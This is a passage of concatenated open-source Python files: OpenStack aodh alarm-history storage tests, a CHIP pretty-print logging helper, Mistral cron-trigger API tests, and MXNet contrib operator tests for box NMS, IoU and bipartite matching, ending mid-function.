self.assertEqual(count, len(history))
def test_clear_alarm_history_no_data_to_remove(self):
utcnow = datetime.datetime(2013, 4, 7, 7, 30)
self._clear_alarm_history(utcnow, 1, 3)
def test_clear_some_alarm_history(self):
utcnow = datetime.datetime(2014, 4, 7, 7, 35)
self._clear_alarm_history(utcnow, 3 * 60, 1)
def test_clear_all_alarm_history(self):
utcnow = datetime.datetime(2014, 4, 7, 7, 45)
self._clear_alarm_history(utcnow, 3 * 60, 0)
def test_delete_history_when_delete_alarm(self):
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual(3, len(alarms))
history = list(self.alarm_conn.query_alarm_history())
self.assertEqual(3, len(history))
for alarm in alarms:
self.alarm_conn.delete_alarm(alarm.alarm_id)
self.assertEqual(3, len(alarms))
history = list(self.alarm_conn.query_alarm_history())
self.assertEqual(0, len(history))
def test_record_severity_when_alarm_change(self):
alarm = list(self.alarm_conn.get_alarms(name='orange-alert'))[0]
severity = "low"
alarm_change = {
"event_id": "3d22800c-a3ca-4991-b34b-d97efb6047d9",
"alarm_id": alarm.alarm_id,
"type": alarm_models.AlarmChange.STATE_TRANSITION,
"detail": "detail %s" % alarm.name,
"user_id": alarm.user_id,
"project_id": alarm.project_id,
"on_behalf_of": alarm.project_id,
"severity": severity,
"timestamp": datetime.datetime(2014, 4, 7, 7, 34)
}
self.alarm_conn.record_alarm_change(alarm_change=alarm_change)
filter_expr = {"=": {"severity": "low"}}
history = list(self.alarm_conn.query_alarm_history(
filter_expr=filter_expr))
self.assertEqual(1, len(history))
self.assertEqual("low", history[0].severity)
class ComplexAlarmQueryTest(AlarmTestBase):
def test_no_filter(self):
self.add_some_alarms()
result = list(self.alarm_conn.query_alarms())
self.assertEqual(3, len(result))
def test_no_filter_with_limit(self):
self.add_some_alarms()
result = list(self.alarm_conn.query_alarms(limit=2))
self.assertEqual(2, len(result))
def test_filter(self):
self.add_some_alarms()
filter_expr = {"and":
[{"or":
[{"=": {"name": "yellow-alert"}},
{"=": {"name": "red-alert"}}]},
{"=": {"enabled": True}}]}
result = list(self.alarm_conn.query_alarms(filter_expr=filter_expr))
self.assertEqual(1, len(result))
for a in result:
self.assertIn(a.name, set(["yellow-alert", "red-alert"]))
self.assertTrue(a.enabled)
def test_filter_with_regexp(self):
self.add_some_alarms()
filter_expr = {"and":
[{"or": [{"=": {"name": "yellow-alert"}},
{"=": {"name": "red-alert"}}]},
{"=~": {"description": "yel.*"}}]}
result = list(self.alarm_conn.query_alarms(filter_expr=filter_expr))
self.assertEqual(1, len(result))
for a in result:
self.assertEqual("yellow", a.description)
def test_filter_for_alarm_id(self):
self.add_some_alarms()
filter_expr = {"=": {"alarm_id": "0r4ng3"}}
result = list(self.alarm_conn.query_alarms(filter_expr=filter_expr))
self.assertEqual(1, len(result))
for a in result:
self.assertEqual("0r4ng3", a.alarm_id)
def test_filter_and_orderby(self):
self.add_some_alarms()
result = list(self.alarm_conn.query_alarms(filter_expr=(
{"=": {"enabled": True}}),
orderby=[{"name": "asc"}]))
self.assertEqual(2, len(result))
self.assertEqual(["orange-alert", "red-alert"],
[a.name for a in result])
for a in result:
self.assertTrue(a.enabled)
class ComplexAlarmHistoryQueryTest(AlarmTestBase):
def setUp(self):
super(DBTestBase, self).setUp()
self.filter_expr = {"and":
[{"or":
[{"=": {"type": "rule change"}},
{"=": {"type": "state transition"}}]},
{"=": {"alarm_id": "0r4ng3"}}]}
self.add_some_alarms()
self.prepare_alarm_history()
def prepare_alarm_history(self):
alarms = list(self.alarm_conn.get_alarms())
name_index = {
'red-alert': 0,
'orange-alert': 1,
'yellow-alert': 2
}
for alarm in alarms:
i = name_index[alarm.name]
alarm_change = dict(event_id=(
"16fd2706-8baf-433b-82eb-8c7fada847c%s" % i),
alarm_id=alarm.alarm_id,
type=alarm_models.AlarmChange.CREATION,
detail="detail %s" % alarm.name,
user_id=alarm.user_id,
project_id=alarm.project_id,
on_behalf_of=alarm.project_id,
timestamp=datetime.datetime(2012, 9, 24,
7 + i,
30 + i))
self.alarm_conn.record_alarm_change(alarm_change=alarm_change)
alarm_change2 = dict(event_id=(
"16fd2706-8baf-433b-82eb-8c7fada847d%s" % i),
alarm_id=alarm.alarm_id,
type=alarm_models.AlarmChange.RULE_CHANGE,
detail="detail %s" % i,
user_id=alarm.user_id,
project_id=alarm.project_id,
on_behalf_of=alarm.project_id,
timestamp=datetime.datetime(2012, 9, 25,
10 + i,
30 + i))
self.alarm_conn.record_alarm_change(alarm_change=alarm_change2)
alarm_change3 = dict(
event_id="16fd2706-8baf-433b-82eb-8c7fada847e%s" % i,
alarm_id=alarm.alarm_id,
type=alarm_models.AlarmChange.STATE_TRANSITION,
detail="detail %s" % (i + 1),
user_id=alarm.user_id,
project_id=alarm.project_id,
on_behalf_of=alarm.project_id,
timestamp=datetime.datetime(2012, 9, 26, 10 + i, 30 + i)
)
if alarm.name == "red-alert":
alarm_change3['on_behalf_of'] = 'and-da-girls'
self.alarm_conn.record_alarm_change(alarm_change=alarm_change3)
def test_alarm_history_with_no_filter(self):
history = list(self.alarm_conn.query_alarm_history())
self.assertEqual(9, len(history))
def test_alarm_history_with_no_filter_and_limit(self):
history = list(self.alarm_conn.query_alarm_history(limit=3))
self.assertEqual(3, len(history))
def test_alarm_history_with_filter(self):
history = list(
self.alarm_conn.query_alarm_history(filter_expr=self.filter_expr))
self.assertEqual(2, len(history))
def test_alarm_history_with_regexp(self):
filter_expr = {"and":
[{"=~": {"type": "(rule)|(state)"}},
{"=": {"alarm_id": "0r4ng3"}}]}
history = list(
self.alarm_conn.query_alarm_history(filter_expr=filter_expr))
self.assertEqual(2, len(history))
def test_alarm_history_with_filter_and_orderby(self):
history = list(
self.alarm_conn.query_alarm_history(filter_expr=self.filter_expr,
orderby=[{"timestamp":
"asc"}]))
self.assertEqual([alarm_models.AlarmChange.RULE_CHANGE,
alarm_models.AlarmChange.STATE_TRANSITION],
[h.type for h in history])
def test_alarm_history_with_filter_and_orderby_and_limit(self):
history = list(
self.alarm_conn.query_alarm_history(filter_expr=self.filter_expr,
orderby=[{"timestamp":
"asc"}],
limit=1))
self.assertEqual(alarm_models.AlarmChange.RULE_CHANGE, history[0].type)
def test_alarm_history_with_on_behalf_of_filter(self):
filter_expr = {"=": {"on_behalf_of": "and-da-girls"}}
history = list(self.alarm_conn.query_alarm_history(
filter_expr=filter_expr))
self.assertEqual(1, len(history))
self.assertEqual("16fd2706-8baf-433b-82eb-8c7fada847e0",
history[0].event_id)
def test_alarm_history_with_alarm_id_as_filter(self):
filter_expr = {"=": {"alarm_id": "r3d"}}
history = list(self.alarm_conn.query_alarm_history(
filter_expr=filter_expr, orderby=[{"timestamp": "asc"}]))
self.assertEqual(3, len(history))
self.assertEqual([alarm_models.AlarmChange.CREATION,
alarm_models.AlarmChange.RULE_CHANGE,
alarm_models.AlarmChange.STATE_TRANSITION],
[h.type for h in history])
| openstack/aodh | aodh/tests/functional/storage/test_storage_scenarios.py | Python | apache-2.0 | 22,582 |
#
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Pretty print logging."""
import logging
import pprint
from typing import Any
def log(level: int, x: Any) -> None:
if logging.getLogger(None).isEnabledFor(level):
for line in pprint.pformat(x).split('\n'):
logging.log(level, line)
def info(x: Any) -> None:
log(logging.INFO, x)
def debug(x: Any) -> None:
log(logging.DEBUG, x)
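# Illustrative usage sketch (not part of the original module): because the
# helpers only pformat when the target level is enabled, large structures
# incur no formatting cost when the logger is quiet. The sample data below is
# made up.
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    sample = {'regions': [{'name': '.text', 'size': 0x1234},
                          {'name': '.bss', 'size': 0x800}]}
    info(sample)   # emitted line by line at INFO
    debug(sample)  # emitted line by line at DEBUG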
| project-chip/connectedhomeip | scripts/tools/memory/memdf/util/pretty.py | Python | apache-2.0 | 957 |
# Copyright 2014 - Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
from unittest import mock
import sqlalchemy as sa
from mistral.db.v2 import api as db_api
from mistral.db.v2.sqlalchemy import models
from mistral import exceptions as exc
from mistral.services import security
from mistral.tests.unit.api import base
from mistral.tests.unit import base as unit_base
WF = models.WorkflowDefinition(
spec={
'version': '2.0',
'name': 'my_wf',
'tasks': {
'task1': {
'action': 'std.noop'
}
}
}
)
WF.update({'id': '123e4567-e89b-12d3-a456-426655440000', 'name': 'my_wf'})
TRIGGER = {
'id': '02abb422-55ef-4bb2-8cb9-217a583a6a3f',
'name': 'my_cron_trigger',
'pattern': '* * * * *',
'workflow_name': WF.name,
'workflow_id': '123e4567-e89b-12d3-a456-426655440000',
'workflow_input': '{}',
'workflow_params': '{}',
'scope': 'private',
'remaining_executions': 42
}
trigger_values = copy.deepcopy(TRIGGER)
trigger_values['workflow_input'] = json.loads(
trigger_values['workflow_input'])
trigger_values['workflow_params'] = json.loads(
trigger_values['workflow_params'])
TRIGGER_DB = models.CronTrigger()
TRIGGER_DB.update(trigger_values)
TRIGGER_DB_WITH_PROJECT_ID = TRIGGER_DB.get_clone()
TRIGGER_DB_WITH_PROJECT_ID.project_id = '<default-project>'
MOCK_WF = mock.MagicMock(return_value=WF)
MOCK_TRIGGER = mock.MagicMock(return_value=TRIGGER_DB)
MOCK_TRIGGERS = mock.MagicMock(return_value=[TRIGGER_DB])
MOCK_DELETE = mock.MagicMock(return_value=1)
MOCK_EMPTY = mock.MagicMock(return_value=[])
MOCK_NOT_FOUND = mock.MagicMock(side_effect=exc.DBEntityNotFoundError())
MOCK_DUPLICATE = mock.MagicMock(side_effect=exc.DBDuplicateEntryError())
class TestCronTriggerController(base.APITest):
@mock.patch.object(db_api, "get_cron_trigger", MOCK_TRIGGER)
def test_get(self):
resp = self.app.get('/v2/cron_triggers/my_cron_trigger')
self.assertEqual(200, resp.status_int)
self.assertDictEqual(TRIGGER, resp.json)
@mock.patch.object(db_api, 'get_cron_trigger')
def test_get_operational_error(self, mocked_get):
mocked_get.side_effect = [
# Emulating DB OperationalError
sa.exc.OperationalError('Mock', 'mock', 'mock'),
TRIGGER_DB # Successful run
]
resp = self.app.get('/v2/cron_triggers/my_cron_trigger')
self.assertEqual(200, resp.status_int)
self.assertDictEqual(TRIGGER, resp.json)
@mock.patch.object(db_api, "get_cron_trigger",
return_value=TRIGGER_DB_WITH_PROJECT_ID)
def test_get_within_project_id(self, mock_get):
resp = self.app.get('/v2/cron_triggers/my_cron_trigger')
self.assertEqual(200, resp.status_int)
self.assertTrue('project_id' in resp.json)
@mock.patch.object(db_api, "get_cron_trigger", MOCK_NOT_FOUND)
def test_get_not_found(self):
resp = self.app.get(
'/v2/cron_triggers/my_cron_trigger',
expect_errors=True
)
self.assertEqual(404, resp.status_int)
@mock.patch.object(db_api, "get_cron_trigger", MOCK_TRIGGER)
def test_get_by_id(self):
resp = self.app.get(
"/v2/cron_triggers/02abb422-55ef-4bb2-8cb9-217a583a6a3f")
self.assertEqual(200, resp.status_int)
self.assertDictEqual(TRIGGER, resp.json)
@mock.patch.object(db_api, "get_workflow_definition", MOCK_WF)
@mock.patch.object(db_api, "create_cron_trigger")
def test_post(self, mock_mtd):
mock_mtd.return_value = TRIGGER_DB
resp = self.app.post_json('/v2/cron_triggers', TRIGGER)
self.assertEqual(201, resp.status_int)
self.assertDictEqual(TRIGGER, resp.json)
self.assertEqual(1, mock_mtd.call_count)
values = mock_mtd.call_args[0][0]
self.assertEqual('* * * * *', values['pattern'])
self.assertEqual(42, values['remaining_executions'])
@mock.patch.object(db_api, "get_workflow_definition", MOCK_WF)
@mock.patch.object(db_api, "create_cron_trigger", MOCK_DUPLICATE)
@mock.patch.object(security, "delete_trust")
def test_post_dup(self, delete_trust):
resp = self.app.post_json(
'/v2/cron_triggers', TRIGGER, expect_errors=True
)
self.assertEqual(1, delete_trust.call_count)
self.assertEqual(409, resp.status_int)
@mock.patch.object(db_api, "get_workflow_definition", MOCK_WF)
@mock.patch.object(db_api, "create_cron_trigger", MOCK_DUPLICATE)
def test_post_same_wf_and_input(self):
trig = TRIGGER.copy()
trig['name'] = 'some_trigger_name'
resp = self.app.post_json(
'/v2/cron_triggers', trig, expect_errors=True
)
self.assertEqual(409, resp.status_int)
@mock.patch.object(db_api, "get_cron_trigger", MOCK_TRIGGER)
@mock.patch.object(db_api, "delete_cron_trigger", MOCK_DELETE)
@mock.patch.object(security, "delete_trust")
def test_delete(self, delete_trust):
resp = self.app.delete('/v2/cron_triggers/my_cron_trigger')
self.assertEqual(1, delete_trust.call_count)
self.assertEqual(204, resp.status_int)
@mock.patch.object(db_api, "get_cron_trigger", MOCK_TRIGGER)
@mock.patch.object(db_api, "delete_cron_trigger", MOCK_DELETE)
@mock.patch.object(security, "delete_trust")
def test_delete_by_id(self, delete_trust):
resp = self.app.delete(
'/v2/cron_triggers/02abb422-55ef-4bb2-8cb9-217a583a6a3f')
self.assertEqual(1, delete_trust.call_count)
self.assertEqual(204, resp.status_int)
@mock.patch.object(db_api, "delete_cron_trigger", MOCK_NOT_FOUND)
def test_delete_not_found(self):
resp = self.app.delete(
'/v2/cron_triggers/my_cron_trigger',
expect_errors=True
)
self.assertEqual(404, resp.status_int)
@mock.patch.object(db_api, "get_cron_triggers", MOCK_TRIGGERS)
def test_get_all(self):
resp = self.app.get('/v2/cron_triggers')
self.assertEqual(200, resp.status_int)
self.assertEqual(1, len(resp.json['cron_triggers']))
self.assertDictEqual(TRIGGER, resp.json['cron_triggers'][0])
@mock.patch.object(db_api, 'get_cron_triggers')
def test_get_all_operational_error(self, mocked_get_all):
mocked_get_all.side_effect = [
# Emulating DB OperationalError
sa.exc.OperationalError('Mock', 'mock', 'mock'),
[TRIGGER_DB] # Successful run
]
resp = self.app.get('/v2/cron_triggers')
self.assertEqual(200, resp.status_int)
self.assertEqual(1, len(resp.json['cron_triggers']))
self.assertDictEqual(TRIGGER, resp.json['cron_triggers'][0])
@mock.patch.object(db_api, 'get_cron_triggers')
@mock.patch('mistral.context.MistralContext.from_environ')
def test_get_all_projects_admin(self, mock_context, mock_get_triggers):
admin_ctx = unit_base.get_context(admin=True)
mock_context.return_value = admin_ctx
resp = self.app.get('/v2/cron_triggers?all_projects=true')
self.assertEqual(200, resp.status_int)
self.assertTrue(mock_get_triggers.call_args[1].get('insecure', False))
@mock.patch.object(db_api, 'get_cron_triggers')
@mock.patch('mistral.context.MistralContext.from_environ')
def test_get_all_filter_project(self, mock_context, mock_get_triggers):
admin_ctx = unit_base.get_context(admin=True)
mock_context.return_value = admin_ctx
resp = self.app.get(
'/v2/cron_triggers?all_projects=true&'
'project_id=192796e61c174f718d6147b129f3f2ff'
)
self.assertEqual(200, resp.status_int)
self.assertTrue(mock_get_triggers.call_args[1].get('insecure', False))
self.assertEqual(
{'eq': '192796e61c174f718d6147b129f3f2ff'},
mock_get_triggers.call_args[1].get('project_id')
)
@mock.patch.object(db_api, "get_cron_triggers", MOCK_EMPTY)
def test_get_all_empty(self):
resp = self.app.get('/v2/cron_triggers')
self.assertEqual(200, resp.status_int)
self.assertEqual(0, len(resp.json['cron_triggers']))
| openstack/mistral | mistral/tests/unit/api/v2/test_cron_triggers.py | Python | apache-2.0 | 8,830 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
import numpy as np
import mxnet as mx
import random
import itertools
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from common import with_seed
import unittest
def test_box_nms_op():
def test_box_nms_forward(data, expected, thresh=0.5, valid=0, topk=-1, coord=2, score=1, cid=0, bid=-1,
force=False, in_format='corner', out_format='corner'):
for dtype in ['float16', 'float32', 'float64']:
data = mx.nd.array(data, dtype=dtype)
out = mx.contrib.nd.box_nms(data, overlap_thresh=thresh, valid_thresh=valid, topk=topk,
coord_start=coord, score_index=score, id_index=cid, background_id=bid,
force_suppress=force, in_format=in_format, out_format=out_format)
assert_almost_equal(out.asnumpy(), expected.astype(dtype), rtol=1e-3, atol=1e-3)
def test_box_nms_backward(data, grad, expected, thresh=0.5, valid=0, topk=-1, coord=2, score=1,
cid=0, bid=-1, force=False, in_format='corner', out_format='corner'):
in_var = mx.sym.Variable('data')
arr_data = mx.nd.array(data)
arr_grad = mx.nd.empty(arr_data.shape)
op = mx.contrib.sym.box_nms(in_var, overlap_thresh=thresh, valid_thresh=valid, topk=topk,
coord_start=coord, score_index=score, id_index=cid, background_id=bid,
force_suppress=force, in_format=in_format, out_format=out_format)
exe = op.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
exe.forward(is_train=True)
exe.backward(mx.nd.array(grad))
assert_almost_equal(arr_grad.asnumpy(), expected)
def corner_to_center(data):
out = np.reshape(data, (-1, 6)).copy()
out[:, 2] = (data[:, 2] + data[:, 4]) / 2.0
out[:, 3] = (data[:, 3] + data[:, 5]) / 2.0
out[:, 4] = data[:, 4] - data[:, 2]
out[:, 5] = data[:, 5] - data[:, 3]
invalid = np.where(data[:, 0] < 0)[0]
out[invalid, :] = -1
return out
def center_to_corner(data):
out = np.reshape(data, (-1, 6)).copy()
out[:, 2] = data[:, 2] - data[:, 4] / 2.0
out[:, 3] = data[:, 3] - data[:, 5] / 2.0
out[:, 4] = data[:, 2] + data[:, 4] / 2.0
out[:, 5] = data[:, 3] + data[:, 5] / 2.0
invalid = np.where(data[:, 0] < 0)[0]
out[invalid, :] = -1
return out
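# Illustrative note (not part of the original test): each row is
# [class_id, score, x1, y1, x2, y2] in corner format and
# [class_id, score, cx, cy, w, h] in center format; rows with a negative
# class_id are treated as invalid. For example:
#
#   corner_to_center(np.array([[0, 0.5, 0.1, 0.1, 0.2, 0.2]]))
#   # -> [[0, 0.5, 0.15, 0.15, 0.1, 0.1]]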
def swap_position(data, expected, coord=2, score=1, cid=0, new_col=0):
data = np.reshape(data, (-1, 6))
expected = np.reshape(expected, (-1, 6))
new_coord = random.randint(0, 6 + new_col - 4)
others = list(range(new_coord)) + list(range(new_coord + 4, 6 + new_col))
random.shuffle(others)
new_score = others[0]
new_cid = others[1]
new_data = np.full((data.shape[0], data.shape[1] + new_col), -1.0)
new_expected = np.full((expected.shape[0], expected.shape[1] + new_col), -1.0)
new_data[:, new_coord:new_coord+4] = data[:, coord:coord+4]
new_data[:, new_score] = data[:, score]
new_data[:, new_cid] = data[:, cid]
new_expected[:, new_coord:new_coord+4] = expected[:, coord:coord+4]
new_expected[:, new_score] = expected[:, score]
new_expected[:, new_cid] = expected[:, cid]
return new_data, new_expected, new_coord, new_score, new_cid
# manually set up test cases
boxes = [[0, 0.5, 0.1, 0.1, 0.2, 0.2], [1, 0.4, 0.1, 0.1, 0.2, 0.2],
[0, 0.3, 0.1, 0.1, 0.14, 0.14], [2, 0.6, 0.5, 0.5, 0.7, 0.8]]
# case1
force = True
thresh = 0.5
expected = [[2, 0.6, 0.5, 0.5, 0.7, 0.8], [0, 0.5, 0.1, 0.1, 0.2, 0.2],
[0, 0.3, 0.1, 0.1, 0.14, 0.14], [-1, -1, -1, -1, -1, -1]]
grad = np.random.rand(4, 6)
expected_in_grad = grad[(1, 3, 2, 0), :]
expected_in_grad[1, :] = 0
test_box_nms_forward(np.array(boxes), np.array(expected), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes), grad, expected_in_grad, force=force, thresh=thresh)
# case2: multi batch
boxes2 = [boxes] * 3
expected2 = [expected] * 3
grad2 = np.array([grad.tolist()] * 3)
expected_in_grad2 = np.array([expected_in_grad.tolist()] * 3)
test_box_nms_forward(np.array(boxes2), np.array(expected2), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes2), grad2, expected_in_grad2, force=force, thresh=thresh)
# another new dim
boxes2 = [boxes2] * 2
expected2 = [expected2] * 2
grad2 = np.array([grad2.tolist()] * 2)
expected_in_grad2 = np.array([expected_in_grad2.tolist()] * 2)
test_box_nms_forward(np.array(boxes2), np.array(expected2), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes2), grad2, expected_in_grad2, force=force, thresh=thresh)
# case3: thresh
thresh = 0.1
boxes3 = boxes
expected3 = [[2, 0.6, 0.5, 0.5, 0.7, 0.8], [0, 0.5, 0.1, 0.1, 0.2, 0.2],
[-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]]
grad3 = np.random.rand(4, 6)
expected_in_grad3 = grad3[(1, 3, 2, 0), :]
expected_in_grad3[(1, 2), :] = 0
test_box_nms_forward(np.array(boxes3), np.array(expected3), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes3), grad3, expected_in_grad3, force=force, thresh=thresh)
# case4: non-force
boxes4 = boxes
force = False
expected4 = [[2, 0.6, 0.5, 0.5, 0.7, 0.8], [0, 0.5, 0.1, 0.1, 0.2, 0.2],
[1, 0.4, 0.1, 0.1, 0.2, 0.2], [-1, -1, -1, -1, -1, -1]]
grad4 = np.random.rand(4, 6)
expected_in_grad4 = grad4[(1, 2, 3, 0), :]
expected_in_grad4[2, :] = 0
test_box_nms_forward(np.array(boxes4), np.array(expected4), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes4), grad4, expected_in_grad4, force=force, thresh=thresh)
# case5: different coding
boxes5 = corner_to_center(np.array(boxes4))
test_box_nms_forward(np.array(boxes5), np.array(expected4), force=force, thresh=thresh,
in_format='center')
expected5 = corner_to_center(np.array(expected4))
test_box_nms_forward(np.array(boxes4), np.array(expected5), force=force, thresh=thresh,
out_format='center')
test_box_nms_forward(np.array(boxes5), np.array(expected5), force=force, thresh=thresh,
in_format='center', out_format='center')
# case6: different position
boxes6, expected6, new_coord, new_score, new_id = swap_position(np.array(boxes4),
np.array(expected4), new_col=2)
test_box_nms_forward(np.array(boxes6), np.array(expected6), force=force, thresh=thresh,
coord=new_coord, score=new_score, cid=new_id)
# case7: no id, should be same with force=True
force = False
thresh = 0.5
test_box_nms_forward(np.array(boxes), np.array(expected), force=force, thresh=thresh, cid=-1)
# case8: multi-batch thresh + topk
boxes8 = [[[1, 1, 0, 0, 10, 10], [1, 0.4, 0, 0, 10, 10], [1, 0.3, 0, 0, 10, 10]],
[[2, 1, 0, 0, 10, 10], [2, 0.4, 0, 0, 10, 10], [2, 0.3, 0, 0, 10, 10]],
[[3, 1, 0, 0, 10, 10], [3, 0.4, 0, 0, 10, 10], [3, 0.3, 0, 0, 10, 10]]]
expected8 = [[[1, 1, 0, 0, 10, 10], [-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]],
[[2, 1, 0, 0, 10, 10], [-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]],
[[3, 1, 0, 0, 10, 10], [-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]]]
grad8 = np.random.rand(3, 3, 6)
expected_in_grad8 = np.zeros((3, 3, 6))
expected_in_grad8[(0, 1, 2), (0, 0, 0), :] = grad8[(0, 1, 2), (0, 0, 0), :]
force = False
thresh = 0.5
valid = 0.5
topk = 2
test_box_nms_forward(np.array(boxes8), np.array(expected8), force=force, thresh=thresh, valid=valid, topk=topk)
test_box_nms_backward(np.array(boxes8), grad8, expected_in_grad8, force=force, thresh=thresh, valid=valid, topk=topk)
# case9: background id filter out
# default background id -1
boxes9 = [[0, 0.5, 0.1, 0.1, 0.2, 0.2], [0, 0.4, 0.1, 0.1, 0.2, 0.2],
[1, 0.3, 0.1, 0.1, 0.14, 0.14], [-1, 0.6, 0.5, 0.5, 0.7, 0.8]]
expected9 = [[0, 0.5, 0.1, 0.1, 0.2, 0.2], [1, 0.3, 0.1, 0.1, 0.14, 0.14],
[-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]]
force = True
thresh = 0.5
grad9 = np.random.rand(4, 6)
expected_in_grad9 = grad9[(0, 2, 1, 3), :]
expected_in_grad9[(1, 3), :] = 0
test_box_nms_forward(np.array(boxes9), np.array(expected9), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes9), grad9, expected_in_grad9, force=force, thresh=thresh)
# set background id
background_id = 0
expected9 = [[-1, 0.6, 0.5, 0.5, 0.7, 0.8], [1, 0.3, 0.1, 0.1, 0.14, 0.14],
[-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]]
grad9 = np.random.rand(4, 6)
expected_in_grad9 = grad9[(2, 3, 1, 0), :]
expected_in_grad9[(0, 1), :] = 0
test_box_nms_forward(np.array(boxes9), np.array(expected9), force=force, thresh=thresh, bid=background_id)
test_box_nms_backward(np.array(boxes9), grad9, expected_in_grad9, force=force, thresh=thresh, bid=background_id)
def test_box_iou_op():
def numpy_box_iou(a, b, fmt='corner'):
def area(left, top, right, bottom):
return np.maximum(0, right - left) * np.maximum(0, bottom - top)
assert a.shape[-1] == 4
assert b.shape[-1] == 4
oshape = a.shape[:-1] + b.shape[:-1]
a = a.reshape((-1, 4))
ashape = a.shape
b = b.reshape((-1, 4))
a = np.tile(a, reps=[1, b.shape[0]]).reshape((-1, 4))
b = np.tile(b, reps=[ashape[0], 1]).reshape((-1, 4))
if fmt == 'corner':
al, at, ar, ab = np.split(a, 4, axis=-1)
bl, bt, br, bb = np.split(b, 4, axis=-1)
elif fmt == 'center':
ax, ay, aw, ah = np.split(a, 4, axis=-1)
bx, by, bw, bh = np.split(b, 4, axis=-1)
al, at, ar, ab = ax - aw / 2, ay - ah / 2, ax + aw / 2, ay + ah / 2
bl, bt, br, bb = bx - bw / 2, by - bh / 2, bx + bw / 2, by + bh / 2
else:
raise NotImplementedError("Fmt {} not supported".format(fmt))
width = np.maximum(0, np.minimum(ar, br) - np.maximum(al, bl))
height = np.maximum(0, np.minimum(ab, bb) - np.maximum(at, bt))
intersect = width * height
union = area(al, at, ar, ab) + area(bl, bt, br, bb) - intersect
union[np.where(intersect <= 0)] = 1e-12
iou = intersect / union
return iou.reshape(oshape)
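    # generate_boxes draws the same random boxes in both encodings: xywh
    # ('center': cx, cy, w, h) and ltrb ('corner': x1, y1, x2, y2), so the two
    # IoU code paths can be cross-checked against each other.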
def generate_boxes(dims):
s1, off1, s2, off2 = np.random.rand(4) * 100
xy = np.random.rand(*(dims + [2])) * s1 + off1
wh = np.random.rand(*(dims + [2])) * s2 + off2
xywh = np.concatenate([xy, wh], axis=-1)
ltrb = np.concatenate([xy - wh / 2, xy + wh / 2], axis=-1)
return xywh, ltrb
for ndima in range(1, 6):
for ndimb in range(1, 6):
dims_a = np.random.randint(low=1, high=3, size=ndima).tolist()
dims_b = np.random.randint(low=1, high=3, size=ndimb).tolist()
# generate left, top, right, bottom
xywh_a, ltrb_a = generate_boxes(dims_a)
xywh_b, ltrb_b = generate_boxes(dims_b)
iou_np = numpy_box_iou(ltrb_a, ltrb_b, fmt='corner')
iou_np2 = numpy_box_iou(xywh_a, xywh_b, fmt='center')
iou_mx = mx.nd.contrib.box_iou(mx.nd.array(ltrb_a), mx.nd.array(ltrb_b), format='corner')
iou_mx2 = mx.nd.contrib.box_iou(mx.nd.array(xywh_a), mx.nd.array(xywh_b), format='center')
assert_allclose(iou_np, iou_np2, rtol=1e-5, atol=1e-5)
assert_allclose(iou_np, iou_mx.asnumpy(), rtol=1e-5, atol=1e-5)
assert_allclose(iou_np, iou_mx2.asnumpy(), rtol=1e-5, atol=1e-5)
def test_bipartite_matching_op():
def assert_match(inputs, x, y, threshold, is_ascend=False):
for dtype in ['float16', 'float32', 'float64']:
inputs = mx.nd.array(inputs, dtype=dtype)
x = np.array(x, dtype=dtype)
y = np.array(y, dtype=dtype)
a, b = mx.nd.contrib.bipartite_matching(inputs, threshold=threshold, is_ascend=is_ascend)
assert_array_equal(a.asnumpy().astype('int64'), x.astype('int64'))
assert_array_equal(b.asnumpy().astype('int64'), y.astype('int64'))
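    # In each call below, the first expected array lists, per row, the matched
    # column index (-1 when unmatched) and the second lists, per column, the
    # matched row index.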
assert_match([[0.5, 0.6], [0.1, 0.2], [0.3, 0.4]], [1, -1, 0], [2, 0], 1e-12, False)
assert_match([[0.5, 0.6], [0.1, 0.2], [0.3, 0.4]], [-1, 0, 1], [1, 2], 100, True)
def test_multibox_target_op():
anchors = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]], ctx=default_context()).reshape((1, -1, 4))
cls_pred = mx.nd.array(list(range(10)), ctx=default_context()).reshape((1, -1, 2))
label = mx.nd.array([1, 0.1, 0.1, 0.5, 0.6], ctx=default_context()).reshape((1, -1, 5))
loc_target, loc_mask, cls_target = \
mx.nd.contrib.MultiBoxTarget(anchors, label, cls_pred,
overlap_threshold=0.5,
negative_mining_ratio=3,
